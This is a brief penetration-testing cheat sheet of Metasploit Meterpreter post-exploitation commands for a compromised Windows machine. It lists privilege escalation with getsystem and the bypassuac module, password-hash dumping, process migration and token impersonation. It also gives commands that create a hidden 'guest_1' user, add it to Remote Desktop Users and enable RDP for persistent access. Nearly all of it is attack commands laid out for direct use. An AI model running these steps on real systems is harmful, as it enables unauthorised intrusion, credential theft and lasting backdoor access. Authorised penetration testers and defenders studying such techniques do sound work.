Auto Run Scripts

AutoRun Script on Metasploit Framework * Penetration Testing

PrivEsc:

getsystem

getuid

#If the above doesn't work, check if UAC is enabled and try the bypassuac module

#Bypass UAC
> background
> use exploit/windows/local/bypassuac

#Dump hashes
run post/windows/gather/hashdump

#Migrate
run post/windows/manage/migrate

#List running processes
ps

#Download file
download

#Upload file
upload

Enum:

sysinfo

run winenum

run post/windows/gather/win_privs

Incognito:

use incognito

list_tokens -u

impersonate_token <token>

RDP:

# Jump into the shell
net user guest_1 guestpwd /add
net localgroup "Remote Desktop Users" guest_1 /add
run getgui -e # Enable RDP